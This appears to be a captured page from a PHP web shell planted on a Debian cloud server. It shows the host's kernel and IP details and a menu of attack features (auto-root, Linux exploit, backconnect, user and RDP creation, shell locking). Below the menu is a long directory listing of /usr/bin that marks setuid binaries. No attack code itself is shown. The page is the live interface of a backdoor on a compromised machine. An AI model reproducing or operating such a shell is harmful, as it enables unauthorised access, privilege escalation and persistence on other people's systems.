Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
X11
[ DIR ]
drwxr-xr-x
[
66.89
KB
-rwxr-xr-x
aa-enabled
18.23
KB
-rwxr-xr-x
aa-exec
18.23
KB
-rwxr-xr-x
aa-features-abi
18.23
KB
-rwxr-xr-x
addpart
30.31
KB
-rwxr-xr-x
addr2line
23.14
KB
-rwxr-xr-x
apropos
51.29
KB
-rwxr-xr-x
apt
18.31
KB
-rwxr-xr-x
apt-cache
86.38
KB
-rwxr-xr-x
apt-cdrom
22.38
KB
-rwxr-xr-x
apt-config
26.31
KB
-rwxr-xr-x
apt-extracttemplates
22.39
KB
-rwxr-xr-x
apt-ftparchive
270.39
KB
-rwxr-xr-x
apt-get
50.38
KB
-rwxr-xr-x
apt-key
27.32
KB
-rwxr-xr-x
apt-listchanges
11.96
KB
-rwxr-xr-x
apt-mark
58.38
KB
-rwxr-xr-x
apt-sortpkgs
38.32
KB
-rwxr-xr-x
ar
51.17
KB
-rwxr-xr-x
arch
42.86
KB
-rwxr-xr-x
as
897.41
KB
-rwxr-xr-x
at
58.37
KB
-rwsr-sr-x
atq
58.37
KB
-rwsr-sr-x
atrm
58.37
KB
-rwsr-sr-x
autoconf
14.85
KB
-rwxr-xr-x
autoheader
8.82
KB
-rwxr-xr-x
autom4te
32.69
KB
-rwxr-xr-x
autoreconf
26.3
KB
-rwxr-xr-x
autoscan
16.77
KB
-rwxr-xr-x
autoupdate
33.22
KB
-rwxr-xr-x
awk
154.66
KB
-rwxr-xr-x
aws
815
B
-rwxr-xr-x
b2sum
58.98
KB
-rwxr-xr-x
base32
46.89
KB
-rwxr-xr-x
base64
46.89
KB
-rwxr-xr-x
basename
42.83
KB
-rwxr-xr-x
basenc
54.89
KB
-rwxr-xr-x
bash
1.21
MB
-rwxr-xr-x
bashbug
6.7
KB
-rwxr-xr-x
batch
152
B
-rwxr-xr-x
bunzip2
38.3
KB
-rwxr-xr-x
busctl
90.5
KB
-rwxr-xr-x
bzcat
38.3
KB
-rwxr-xr-x
bzcmp
2.17
KB
-rwxr-xr-x
bzdiff
2.17
KB
-rwxr-xr-x
bzegrep
3.69
KB
-rwxr-xr-x
bzexe
4.78
KB
-rwxr-xr-x
bzfgrep
3.69
KB
-rwxr-xr-x
bzgrep
3.69
KB
-rwxr-xr-x
bzip2
38.3
KB
-rwxr-xr-x
bzip2recover
14.23
KB
-rwxr-xr-x
bzless
1.27
KB
-rwxr-xr-x
bzmore
1.27
KB
-rwxr-xr-x
c++
1.25
MB
-rwxr-xr-x
c++filt
18.51
KB
-rwxr-xr-x
c89
428
B
-rwxr-xr-x
c89-gcc
428
B
-rwxr-xr-x
c99
454
B
-rwxr-xr-x
c99-gcc
454
B
-rwxr-xr-x
c_rehash
6.73
KB
-rwxr-xr-x
cal
36.84
KB
-rwxr-xr-x
captoinfo
90.34
KB
-rwxr-xr-x
cat
42.98
KB
-rwxr-xr-x
catman
42.77
KB
-rwxr-xr-x
cc
1.24
MB
-rwxr-xr-x
chacl
14.23
KB
-rwxr-xr-x
chage
78.49
KB
-rwxr-sr-x
chardet
221
B
-rwxr-xr-x
chardetect
221
B
-rwxr-xr-x
chattr
14.24
KB
-rwxr-xr-x
chcon
67.11
KB
-rwxr-xr-x
chfn
61.2
KB
-rwsr-xr-x
chgrp
67.05
KB
-rwxr-xr-x
chmod
62.98
KB
-rwxr-xr-x
choom
54.31
KB
-rwxr-xr-x
chown
71.05
KB
-rwxr-xr-x
chrt
66.31
KB
-rwxr-xr-x
chsh
51.64
KB
-rwsr-xr-x
cksum
139.05
KB
-rwxr-xr-x
clear
14.24
KB
-rwxr-xr-x
clear_console
14.15
KB
-rwxr-xr-x
cloud-id
972
B
-rwxr-xr-x
cloud-init
976
B
-rwxr-xr-x
cloud-init-per
2.06
KB
-rwxr-xr-x
cloud-localds
7.21
KB
-rwxr-xr-x
cmp
50.95
KB
-rwxr-xr-x
col
34.31
KB
-rwxr-xr-x
colcrt
14.31
KB
-rwxr-xr-x
colrm
30.31
KB
-rwxr-xr-x
column
54.31
KB
-rwxr-xr-x
comm
46.92
KB
-rwxr-xr-x
corelist
15.01
KB
-rwxr-xr-x
cp
147.61
KB
-rwxr-xr-x
cpan
8.16
KB
-rwxr-xr-x
cpan5.36-x86_64-linux-gnu
8.18
KB
-rwxr-xr-x
cpio
158.56
KB
-rwxr-xr-x
cpp
1.24
MB
-rwxr-xr-x
cpp-12
1.24
MB
-rwxr-xr-x
crontab
42.63
KB
-rwxr-sr-x
csplit
119.17
KB
-rwxr-xr-x
ctstat
26.59
KB
-rwxr-xr-x
curl
274.22
KB
-rwxr-xr-x
cut
46.98
KB
-rwxr-xr-x
cvtsudoers
337.19
KB
-rwxr-xr-x
dash
122.7
KB
-rwxr-xr-x
date
119.05
KB
-rwxr-xr-x
dbus-cleanup-sockets
14.22
KB
-rwxr-xr-x
dbus-daemon
238.56
KB
-rwxr-xr-x
dbus-monitor
26.23
KB
-rwxr-xr-x
dbus-run-session
14.23
KB
-rwxr-xr-x
dbus-send
30.22
KB
-rwxr-xr-x
dbus-update-activation-environ...
14.22
KB
-rwxr-xr-x
dbus-uuidgen
14.22
KB
-rwxr-xr-x
dd
87.15
KB
-rwxr-xr-x
deb-systemd-helper
23.79
KB
-rwxr-xr-x
deb-systemd-invoke
6.09
KB
-rwxr-xr-x
debconf
2.79
KB
-rwxr-xr-x
debconf-apt-progress
11.27
KB
-rwxr-xr-x
debconf-communicate
608
B
-rwxr-xr-x
debconf-copydb
1.68
KB
-rwxr-xr-x
debconf-escape
647
B
-rwxr-xr-x
debconf-set-selections
2.92
KB
-rwxr-xr-x
debconf-show
1.78
KB
-rwxr-xr-x
debianbts
217
B
-rwxr-xr-x
delpart
30.31
KB
-rwxr-xr-x
delv
41.3
KB
-rwxr-xr-x
devdump
180.17
KB
-rwxr-xr-x
df
99.8
KB
-rwxr-xr-x
dh_autotools-dev_restoreconfig
1.79
KB
-rwxr-xr-x
dh_autotools-dev_updateconfig
1.81
KB
-rwxr-xr-x
dh_bash-completion
4.31
KB
-rwxr-xr-x
dh_installxmlcatalogs
9.22
KB
-rwxr-xr-x
diff
151.58
KB
-rwxr-xr-x
diff3
67.14
KB
-rwxr-xr-x
dig
142.77
KB
-rwxr-xr-x
dir
147.8
KB
-rwxr-xr-x
dircolors
50.92
KB
-rwxr-xr-x
dirname
38.83
KB
-rwxr-xr-x
dirsplit
16.74
KB
-rwxr-xr-x
dmesg
86.58
KB
-rwxr-xr-x
dnsdomainname
22.15
KB
-rwxr-xr-x
dnstap-read
18.33
KB
-rwxr-xr-x
docutils
960
B
-rwxr-xr-x
domainname
22.15
KB
-rwxr-xr-x
dpkg
310.64
KB
-rwxr-xr-x
dpkg-architecture
14.85
KB
-rwxr-xr-x
dpkg-buildflags
8.14
KB
-rwxr-xr-x
dpkg-buildpackage
32.63
KB
-rwxr-xr-x
dpkg-checkbuilddeps
7.45
KB
-rwxr-xr-x
dpkg-deb
166.52
KB
-rwxr-xr-x
dpkg-distaddfile
2.72
KB
-rwxr-xr-x
dpkg-divert
154.55
KB
-rwxr-xr-x
dpkg-genbuildinfo
18.48
KB
-rwxr-xr-x
dpkg-genchanges
17.39
KB
-rwxr-xr-x
dpkg-gencontrol
14.2
KB
-rwxr-xr-x
dpkg-gensymbols
10.65
KB
-rwxr-xr-x
dpkg-maintscript-helper
20.71
KB
-rwxr-xr-x
dpkg-mergechangelogs
8.88
KB
-rwxr-xr-x
dpkg-name
6.62
KB
-rwxr-xr-x
dpkg-parsechangelog
4.83
KB
-rwxr-xr-x
dpkg-query
158.58
KB
-rwxr-xr-x
dpkg-realpath
4.09
KB
-rwxr-xr-x
dpkg-scanpackages
8.47
KB
-rwxr-xr-x
dpkg-scansources
8.98
KB
-rwxr-xr-x
dpkg-shlibdeps
31.17
KB
-rwxr-xr-x
dpkg-source
22.91
KB
-rwxr-xr-x
dpkg-split
126.48
KB
-rwxr-xr-x
dpkg-statoverride
62.33
KB
-rwxr-xr-x
dpkg-trigger
86.48
KB
-rwxr-xr-x
dpkg-vendor
3.18
KB
-rwxr-xr-x
du
171.33
KB
-rwxr-xr-x
dwp
1.79
MB
-rwxr-xr-x
ec2-metadata
7.71
KB
-rwxr-xr-x
ec2metadata
8.38
KB
-rwxr-xr-x
echo
42.83
KB
-rwxr-xr-x
editor
280.74
KB
-rwxr-xr-x
egrep
41
B
-rwxr-xr-x
eject
82.16
KB
-rwxr-xr-x
elfedit
35.03
KB
-rwxr-xr-x
enc2xs
40.96
KB
-rwxr-xr-x
encguess
3
KB
-rwxr-xr-x
env
47.4
KB
-rwxr-xr-x
envsubst
34.31
KB
-rwxr-xr-x
eqn
205.42
KB
-rwxr-xr-x
ex
3.48
MB
-rwxr-xr-x
expand
42.92
KB
-rwxr-xr-x
expiry
30.45
KB
-rwxr-sr-x
expr
115.05
KB
-rwxr-xr-x
factor
83.2
KB
-rwxr-xr-x
faillog
22.53
KB
-rwxr-xr-x
fallocate
34.31
KB
-rwxr-xr-x
false
34.83
KB
-rwxr-xr-x
fgrep
41
B
-rwxr-xr-x
filan
96.02
KB
-rwxr-xr-x
file
26.48
KB
-rwxr-xr-x
fincore
34.36
KB
-rwxr-xr-x
find
219.58
KB
-rwxr-xr-x
findmnt
83.59
KB
-rwxr-xr-x
flock
34.39
KB
-rwxr-xr-x
fmt
46.89
KB
-rwxr-xr-x
fold
42.89
KB
-rwxr-xr-x
free
26.3
KB
-rwxr-xr-x
funzip
22.46
KB
-rwxr-xr-x
fuser
39.83
KB
-rwxr-xr-x
g++
1.25
MB
-rwxr-xr-x
g++-12
1.25
MB
-rwxr-xr-x
gcc
1.24
MB
-rwxr-xr-x
gcc-12
1.24
MB
-rwxr-xr-x
gcc-ar
34.54
KB
-rwxr-xr-x
gcc-ar-12
34.54
KB
-rwxr-xr-x
gcc-nm
34.54
KB
-rwxr-xr-x
gcc-nm-12
34.54
KB
-rwxr-xr-x
gcc-ranlib
34.54
KB
-rwxr-xr-x
gcc-ranlib-12
34.54
KB
-rwxr-xr-x
gcov
720.16
KB
-rwxr-xr-x
gcov-12
720.16
KB
-rwxr-xr-x
gcov-dump
568.02
KB
-rwxr-xr-x
gcov-dump-12
568.02
KB
-rwxr-xr-x
gcov-tool
588.09
KB
-rwxr-xr-x
gcov-tool-12
588.09
KB
-rwxr-xr-x
gencat
26.75
KB
-rwxr-xr-x
genisoimage
631.17
KB
-rwxr-xr-x
geqn
205.42
KB
-rwxr-xr-x
getconf
26.5
KB
-rwxr-xr-x
geteltorito
6.06
KB
-rwxr-xr-x
getent
35.47
KB
-rwxr-xr-x
getfacl
30.8
KB
-rwxr-xr-x
getopt
34.31
KB
-rwxr-xr-x
gettext
34.31
KB
-rwxr-xr-x
gettext.sh
5.07
KB
-rwxr-xr-x
git
3.54
MB
-rwxr-xr-x
git-receive-pack
3.54
MB
-rwxr-xr-x
git-shell
2.04
MB
-rwxr-xr-x
git-upload-archive
3.54
MB
-rwxr-xr-x
git-upload-pack
3.54
MB
-rwxr-xr-x
gmake
234.65
KB
-rwxr-xr-x
gold
2.99
MB
-rwxr-xr-x
gonit
8.2
MB
-rwxr-xr-x
gp-archive
159.06
KB
-rwxr-xr-x
gp-collect-app
175.27
KB
-rwxr-xr-x
gp-display-html
578.29
KB
-rwxr-xr-x
gp-display-src
150.81
KB
-rwxr-xr-x
gp-display-text
257.3
KB
-rwxr-xr-x
gpasswd
86.42
KB
-rwsr-xr-x
gpgv
463
KB
-rwxr-xr-x
gpic
220.27
KB
-rwxr-xr-x
gprof
108.35
KB
-rwxr-xr-x
gprofng
146.59
KB
-rwxr-xr-x
grep
198.39
KB
-rwxr-xr-x
grep-aptavail
52.54
KB
-rwxr-xr-x
grep-available
52.54
KB
-rwxr-xr-x
grep-dctrl
52.54
KB
-rwxr-xr-x
grep-debtags
52.54
KB
-rwxr-xr-x
grep-status
52.54
KB
-rwxr-xr-x
groff
125.45
KB
-rwxr-xr-x
grog
2.71
KB
-rwxr-xr-x
grops
185.86
KB
-rwxr-xr-x
grotty
137.48
KB
-rwxr-xr-x
groups
42.89
KB
-rwxr-xr-x
growpart
29.19
KB
-rwxr-xr-x
grub-editenv
374.16
KB
-rwxr-xr-x
grub-file
809.41
KB
-rwxr-xr-x
grub-fstest
931.13
KB
-rwxr-xr-x
grub-glue-efi
245.01
KB
-rwxr-xr-x
grub-kbdcomp
1.64
KB
-rwxr-xr-x
grub-menulst2cfg
229.05
KB
-rwxr-xr-x
grub-mkfont
273.66
KB
-rwxr-xr-x
grub-mkimage
354.2
KB
-rwxr-xr-x
grub-mklayout
249.29
KB
-rwxr-xr-x
grub-mknetdir
410.99
KB
-rwxr-xr-x
grub-mkpasswd-pbkdf2
257.35
KB
-rwxr-xr-x
grub-mkrelpath
244.7
KB
-rwxr-xr-x
grub-mkrescue
987.84
KB
-rwxr-xr-x
grub-mkstandalone
487.32
KB
-rwxr-xr-x
grub-mount
754.05
KB
-rwxr-xr-x
grub-render-label
822.01
KB
-rwxr-xr-x
grub-script-check
272.82
KB
-rwxr-xr-x
grub-syslinux2cfg
770.52
KB
-rwxr-xr-x
gtbl
146.43
KB
-rwxr-xr-x
gunzip
2.29
KB
-rwxr-xr-x
gzexe
6.3
KB
-rwxr-xr-x
gzip
95.84
KB
-rwxr-xr-x
h2ph
28.54
KB
-rwxr-xr-x
h2xs
59.51
KB
-rwxr-xr-x
hardlink
50.39
KB
-rwxr-xr-x
hd
58.32
KB
-rwxr-xr-x
head
46.95
KB
-rwxr-xr-x
helpztags
2.46
KB
-rwxr-xr-x
hexdump
58.32
KB
-rwxr-xr-x
host
114.7
KB
-rwxr-xr-x
hostid
38.83
KB
-rwxr-xr-x
hostname
22.15
KB
-rwxr-xr-x
hostnamectl
30.38
KB
-rwxr-xr-x
i386
26.58
KB
-rwxr-xr-x
iconv
63.13
KB
-rwxr-xr-x
id
47.02
KB
-rwxr-xr-x
ifnames
4.08
KB
-rwxr-xr-x
infocmp
62.31
KB
-rwxr-xr-x
infotocap
90.34
KB
-rwxr-xr-x
install
155.8
KB
-rwxr-xr-x
instmodsh
4.27
KB
-rwxr-xr-x
ionice
34.31
KB
-rwxr-xr-x
ip
674.82
KB
-rwxr-xr-x
ipcmk
34.38
KB
-rwxr-xr-x
ipcrm
34.31
KB
-rwxr-xr-x
ipcs
74.31
KB
-rwxr-xr-x
iptables-xml
88.98
KB
-rwxr-xr-x
ischroot
14.32
KB
-rwxr-xr-x
isodump
180.17
KB
-rwxr-xr-x
isoinfo
343.42
KB
-rwxr-xr-x
isovfy
184.14
KB
-rwxr-xr-x
join
54.98
KB
-rwxr-xr-x
join-dctrl
35.13
KB
-rwxr-xr-x
journalctl
74.64
KB
-rwxr-xr-x
json-patch-jsondiff
1004
B
-rwxr-xr-x
json_pp
4.88
KB
-rwxr-xr-x
jsondiff
1004
B
-rwxr-xr-x
jsonpatch
3.77
KB
-rwxr-xr-x
jsonpointer
1.79
KB
-rwxr-xr-x
jsonschema
213
B
-rwxr-xr-x
kernel-install
12.75
KB
-rwxr-xr-x
kill
22.3
KB
-rwxr-xr-x
killall
31.95
KB
-rwxr-xr-x
kmod
174.27
KB
-rwxr-xr-x
last
50.31
KB
-rwxr-xr-x
lastb
50.31
KB
-rwxr-xr-x
lastlog
31.75
KB
-rwxr-xr-x
lcf
7.6
KB
-rwxr-xr-x
ld
1.27
MB
-rwxr-xr-x
ld.bfd
1.27
MB
-rwxr-xr-x
ld.gold
2.99
MB
-rwxr-xr-x
ld.so
209.96
KB
-rwxr-xr-x
ldd
5.28
KB
-rwxr-xr-x
less
194.3
KB
-rwxr-xr-x
lessecho
14.24
KB
-rwxr-xr-x
lessfile
8.83
KB
-rwxr-xr-x
lesskey
23.63
KB
-rwxr-xr-x
lesspipe
8.83
KB
-rwxr-xr-x
lexgrog
107.48
KB
-rwxr-xr-x
lft
2.43
KB
-rwxr-xr-x
lft.db
2.43
KB
-rwxr-xr-x
libnetcfg
15.41
KB
-rwxr-xr-x
libtoolize
133.12
KB
-rwxr-xr-x
link
38.83
KB
-rwxr-xr-x
linux-check-removal
4.56
KB
-rwxr-xr-x
linux-update-symlinks
6.17
KB
-rwxr-xr-x
linux-version
2.63
KB
-rwxr-xr-x
linux32
26.58
KB
-rwxr-xr-x
linux64
26.58
KB
-rwxr-xr-x
ln
71.12
KB
-rwxr-xr-x
lnstat
26.59
KB
-rwxr-xr-x
locale
46.16
KB
-rwxr-xr-x
localectl
26.38
KB
-rwxr-xr-x
localedef
291.91
KB
-rwxr-xr-x
logger
54.9
KB
-rwxr-xr-x
login
51.78
KB
-rwxr-xr-x
loginctl
58.48
KB
-rwxr-xr-x
logname
38.83
KB
-rwxr-xr-x
look
18.31
KB
-rwxr-xr-x
ls
147.8
KB
-rwxr-xr-x
lsattr
14.24
KB
-rwxr-xr-x
lsb_release
2.59
KB
-rwxr-xr-x
lsblk
202.31
KB
-rwxr-xr-x
lscpu
126.31
KB
-rwxr-xr-x
lsfd
120.3
KB
-rwxr-xr-x
lsinitramfs
735
B
-rwxr-xr-x
lsipc
98.31
KB
-rwxr-xr-x
lsirq
34.48
KB
-rwxr-xr-x
lslocks
70.7
KB
-rwxr-xr-x
lslogins
94.31
KB
-rwxr-xr-x
lsmem
66.31
KB
-rwxr-xr-x
lsmod
174.27
KB
-rwxr-xr-x
lsns
82.31
KB
-rwxr-xr-x
lspci
104.04
KB
-rwxr-xr-x
lto-dump
30.47
MB
-rwxr-xr-x
lto-dump-12
30.47
MB
-rwxr-xr-x
lzcat
82.7
KB
-rwxr-xr-x
lzcmp
7.25
KB
-rwxr-xr-x
lzdiff
7.25
KB
-rwxr-xr-x
lzegrep
10.09
KB
-rwxr-xr-x
lzfgrep
10.09
KB
-rwxr-xr-x
lzgrep
10.09
KB
-rwxr-xr-x
lzless
1.77
KB
-rwxr-xr-x
lzma
82.7
KB
-rwxr-xr-x
lzmainfo
14.3
KB
-rwxr-xr-x
lzmore
2.14
KB
-rwxr-xr-x
m4
271.52
KB
-rwxr-xr-x
make
234.65
KB
-rwxr-xr-x
make-first-existing-target
4.79
KB
-rwxr-xr-x
man
121.36
KB
-rwxr-xr-x
man-recode
35.38
KB
-rwxr-xr-x
mandb
147.61
KB
-rwxr-xr-x
manpath
34.78
KB
-rwxr-xr-x
markdown-it
220
B
-rwxr-xr-x
mawk
154.66
KB
-rwxr-xr-x
mcookie
34.38
KB
-rwxr-xr-x
md5sum
50.95
KB
-rwxr-xr-x
md5sum.textutils
50.95
KB
-rwxr-xr-x
mdig
46.33
KB
-rwxr-xr-x
mesg
18.3
KB
-rwxr-xr-x
mkdir
95.27
KB
-rwxr-xr-x
mkfifo
67.17
KB
-rwxr-xr-x
mkisofs
631.17
KB
-rwxr-xr-x
mknod
71.2
KB
-rwxr-xr-x
mktemp
42.92
KB
-rwxr-xr-x
mkzftree
30.84
KB
-rwxr-xr-x
mokutil
60.27
KB
-rwxr-xr-x
monit
8.2
MB
-rwxr-xr-x
more
58.31
KB
-rwxr-xr-x
mount
58.3
KB
-rwsr-xr-x
mount-image-callback
13.86
KB
-rwxr-xr-x
mountpoint
18.3
KB
-rwxr-xr-x
mt
83.38
KB
-rwxr-xr-x
mt-gnu
83.38
KB
-rwxr-xr-x
mv
139.62
KB
-rwxr-xr-x
namei
34.31
KB
-rwxr-xr-x
nano
280.74
KB
-rwxr-xr-x
nawk
154.66
KB
-rwxr-xr-x
ncal
36.84
KB
-rwxr-xr-x
neqn
913
B
-rwxr-xr-x
netstat
151.66
KB
-rwxr-xr-x
networkctl
106.38
KB
-rwxr-xr-x
newgrp
47.75
KB
-rwsr-xr-x
ngettext
34.31
KB
-rwxr-xr-x
nice
42.86
KB
-rwxr-xr-x
nisdomainname
22.15
KB
-rwxr-xr-x
nl
111.11
KB
-rwxr-xr-x
nm
44.03
KB
-rwxr-xr-x
nohup
42.89
KB
-rwxr-xr-x
normalizer
244
B
-rwxr-xr-x
nproc
42.89
KB
-rwxr-xr-x
nroff
3.22
KB
-rwxr-xr-x
nsenter
34.54
KB
-rwxr-xr-x
nslookup
114.74
KB
-rwxr-xr-x
nstat
104.45
KB
-rwxr-xr-x
nsupdate
74.55
KB
-rwxr-xr-x
numfmt
67.02
KB
-rwxr-xr-x
objcopy
155.66
KB
-rwxr-xr-x
objdump
362.56
KB
-rwxr-xr-x
od
79.02
KB
-rwxr-xr-x
openssl
953.26
KB
-rwxr-xr-x
pager
194.3
KB
-rwxr-xr-x
partx
118.31
KB
-rwxr-xr-x
passwd
66.65
KB
-rwsr-xr-x
paste
42.89
KB
-rwxr-xr-x
patch
187.44
KB
-rwxr-xr-x
pathchk
42.86
KB
-rwxr-xr-x
pdb3
62.4
KB
-rwxr-xr-x
pdb3.11
62.4
KB
-rwxr-xr-x
peekfd
14.5
KB
-rwxr-xr-x
perl
3.63
MB
-rwxr-xr-x
perl5.36-x86_64-linux-gnu
14.41
KB
-rwxr-xr-x
perl5.36.0
3.63
MB
-rwxr-xr-x
perlbug
44.12
KB
-rwxr-xr-x
perldoc
125
B
-rwxr-xr-x
perlivp
10.61
KB
-rwxr-xr-x
perlthanks
44.12
KB
-rwxr-xr-x
pgrep
34.42
KB
-rwxr-xr-x
pic
220.27
KB
-rwxr-xr-x
pico
280.74
KB
-rwxr-xr-x
piconv
8.16
KB
-rwxr-xr-x
pidof
26.31
KB
-rwxr-xr-x
pidwait
34.42
KB
-rwxr-xr-x
ping
88.45
KB
-rwxr-xr-x
ping4
88.45
KB
-rwxr-xr-x
ping6
88.45
KB
-rwxr-xr-x
pinky
47.05
KB
-rwxr-xr-x
pkaction
18.23
KB
-rwxr-xr-x
pkcheck
22.3
KB
-rwxr-xr-x
pkill
34.42
KB
-rwxr-xr-x
pkttyagent
18.23
KB
-rwxr-xr-x
pl2pm
4.43
KB
-rwxr-xr-x
pldd
22.69
KB
-rwxr-xr-x
pmap
34.34
KB
-rwxr-xr-x
pod2html
4.04
KB
-rwxr-xr-x
pod2man
14.68
KB
-rwxr-xr-x
pod2text
10.55
KB
-rwxr-xr-x
pod2usage
4.01
KB
-rwxr-xr-x
podchecker
3.57
KB
-rwxr-xr-x
pr
79.11
KB
-rwxr-xr-x
preconv
66.43
KB
-rwxr-xr-x
printenv
34.83
KB
-rwxr-xr-x
printf
62.92
KB
-rwxr-xr-x
prlimit
38.83
KB
-rwxr-xr-x
procan
79.91
KB
-rwxr-xr-x
prove
13.34
KB
-rwxr-xr-x
prtstat
18.57
KB
-rwxr-xr-x
ps
142.93
KB
-rwxr-xr-x
pslog
14.45
KB
-rwxr-xr-x
pstree
35.78
KB
-rwxr-xr-x
pstree.x11
35.78
KB
-rwxr-xr-x
ptar
3.48
KB
-rwxr-xr-x
ptardiff
2.58
KB
-rwxr-xr-x
ptargrep
4.29
KB
-rwxr-xr-x
ptx
135.23
KB
-rwxr-xr-x
pwd
42.92
KB
-rwxr-xr-x
pwdx
14.3
KB
-rwxr-xr-x
py3clean
7.63
KB
-rwxr-xr-x
py3compile
13
KB
-rwxr-xr-x
py3versions
12.52
KB
-rwxr-xr-x
pydoc3
79
B
-rwxr-xr-x
pydoc3.11
79
B
-rwxr-xr-x
pygettext3
23.67
KB
-rwxr-xr-x
pygettext3.11
23.67
KB
-rwxr-xr-x
pygmentize
970
B
-rwxr-xr-x
pyserial-miniterm
975
B
-rwxr-xr-x
pyserial-ports
969
B
-rwxr-xr-x
python3
6.52
MB
-rwxr-xr-x
python3.11
6.52
MB
-rwxr-xr-x
pzstd
742.38
KB
-rwxr-xr-x
qemu-img
2.19
MB
-rwxr-xr-x
qemu-io
2.14
MB
-rwxr-xr-x
qemu-nbd
2.33
MB
-rwxr-xr-x
querybts
10.64
KB
-rwxr-xr-x
ranlib
51.17
KB
-rwxr-xr-x
rbash
1.21
MB
-rwxr-xr-x
rdma
180.6
KB
-rwxr-xr-x
readelf
751.38
KB
-rwxr-xr-x
readlink
50.89
KB
-rwxr-xr-x
realpath
50.92
KB
-rwxr-xr-x
rename.ul
22.3
KB
-rwxr-xr-x
renice
14.3
KB
-rwxr-xr-x
reportbug
110.11
KB
-rwxr-xr-x
reset
30.24
KB
-rwxr-xr-x
resize-part-image
4.23
KB
-rwxr-xr-x
resizepart
70.31
KB
-rwxr-xr-x
resolvectl
146.53
KB
-rwxr-xr-x
rev
14.3
KB
-rwxr-xr-x
rgrep
30
B
-rwxr-xr-x
rm
71.05
KB
-rwxr-xr-x
rmdir
54.92
KB
-rwxr-xr-x
rnano
280.74
KB
-rwxr-xr-x
routel
1.62
KB
-rwxr-xr-x
rpcgen
95
KB
-rwxr-xr-x
rst-buildhtml
11.17
KB
-rwxr-xr-x
rst2html
592
B
-rwxr-xr-x
rst2html4
714
B
-rwxr-xr-x
rst2html5
1.03
KB
-rwxr-xr-x
rst2latex
791
B
-rwxr-xr-x
rst2man
614
B
-rwxr-xr-x
rst2odt
780
B
-rwxr-xr-x
rst2odt_prepstyles
2.01
KB
-rwxr-xr-x
rst2pseudoxml
599
B
-rwxr-xr-x
rst2s5
635
B
-rwxr-xr-x
rst2xetex
871
B
-rwxr-xr-x
rst2xml
600
B
-rwxr-xr-x
rstpep2html
668
B
-rwxr-xr-x
rtstat
26.59
KB
-rwxr-xr-x
run-parts
26.91
KB
-rwxr-xr-x
runcon
42.95
KB
-rwxr-xr-x
rview
3.48
MB
-rwxr-xr-x
rvim
3.48
MB
-rwxr-xr-x
salt-call
295
B
-rwxr-xr-x
salt-minion
299
B
-rwxr-xr-x
salt-pip
293
B
-rwxr-xr-x
salt-proxy
297
B
-rwxr-xr-x
savelog
10.24
KB
-rwxr-xr-x
scalar
2.1
MB
-rwxr-xr-x
scp
266.63
KB
-rwxr-xr-x
screen
471.09
KB
-rwxr-xr-x
script
70.3
KB
-rwxr-xr-x
scriptlive
54.3
KB
-rwxr-xr-x
scriptreplay
46.3
KB
-rwxr-xr-x
sdiff
55.08
KB
-rwxr-xr-x
sed
123.46
KB
-rwxr-xr-x
select-editor
2.39
KB
-rwxr-xr-x
sensible-browser
1.26
KB
-rwxr-xr-x
sensible-editor
1.24
KB
-rwxr-xr-x
sensible-pager
565
B
-rwxr-xr-x
seq
58.92
KB
-rwxr-xr-x
setarch
26.58
KB
-rwxr-xr-x
setfacl
38.84
KB
-rwxr-xr-x
setpci
30.31
KB
-rwxr-xr-x
setpriv
78.31
KB
-rwxr-xr-x
setsid
14.3
KB
-rwxr-xr-x
setterm
46.31
KB
-rwxr-xr-x
sftp
282.59
KB
-rwxr-xr-x
sg
47.75
KB
-rwsr-xr-x
sh
122.7
KB
-rwxr-xr-x
sha1sum
54.95
KB
-rwxr-xr-x
sha224sum
58.95
KB
-rwxr-xr-x
sha256sum
58.95
KB
-rwxr-xr-x
sha384sum
62.95
KB
-rwxr-xr-x
sha512sum
62.95
KB
-rwxr-xr-x
shasum
9.75
KB
-rwxr-xr-x
shred
63.14
KB
-rwxr-xr-x
shuf
58.98
KB
-rwxr-xr-x
size
26.86
KB
-rwxr-xr-x
skill
30.33
KB
-rwxr-xr-x
slabtop
22.37
KB
-rwxr-xr-x
sleep
42.86
KB
-rwxr-xr-x
slogin
1.07
MB
-rwxr-xr-x
snice
30.33
KB
-rwxr-xr-x
socat
401.98
KB
-rwxr-xr-x
soelim
50.43
KB
-rwxr-xr-x
sort
115.68
KB
-rwxr-xr-x
sort-dctrl
38.98
KB
-rwxr-xr-x
splain
18.99
KB
-rwxr-xr-x
split
59.55
KB
-rwxr-xr-x
ss
189.14
KB
-rwxr-xr-x
ssh
1.07
MB
-rwxr-xr-x
ssh-add
518.44
KB
-rwxr-xr-x
ssh-agent
474.38
KB
-rwxr-sr-x
ssh-argv0
1.42
KB
-rwxr-xr-x
ssh-copy-id
12.38
KB
-rwxr-xr-x
ssh-keygen
646.44
KB
-rwxr-xr-x
ssh-keyscan
622.47
KB
-rwxr-xr-x
stat
95.2
KB
-rwxr-xr-x
stdbuf
58.92
KB
-rwxr-xr-x
streamzip
7.75
KB
-rwxr-xr-x
strings
30.98
KB
-rwxr-xr-x
strip
155.7
KB
-rwxr-xr-x
stty
83.02
KB
-rwxr-xr-x
su
70.31
KB
-rwsr-xr-x
sudo
275.02
KB
-rwsr-xr-x
sudoedit
275.02
KB
-rwsr-xr-x
sudoreplay
115.7
KB
-rwxr-xr-x
sum
50.96
KB
-rwxr-xr-x
sync
38.89
KB
-rwxr-xr-x
systemctl
1.29
MB
-rwxr-xr-x
systemd
90.38
KB
-rwxr-xr-x
systemd-analyze
182.61
KB
-rwxr-xr-x
systemd-ask-password
18.48
KB
-rwxr-xr-x
systemd-cat
18.38
KB
-rwxr-xr-x
systemd-cgls
22.48
KB
-rwxr-xr-x
systemd-cgtop
38.4
KB
-rwxr-xr-x
systemd-creds
42.61
KB
-rwxr-xr-x
systemd-cryptenroll
58.6
KB
-rwxr-xr-x
systemd-delta
26.38
KB
-rwxr-xr-x
systemd-detect-virt
18.37
KB
-rwxr-xr-x
systemd-escape
18.37
KB
-rwxr-xr-x
systemd-firstboot
50.59
KB
-rwxr-xr-x
systemd-hwdb
126.66
KB
-rwxr-xr-x
systemd-id128
22.37
KB
-rwxr-xr-x
systemd-inhibit
22.39
KB
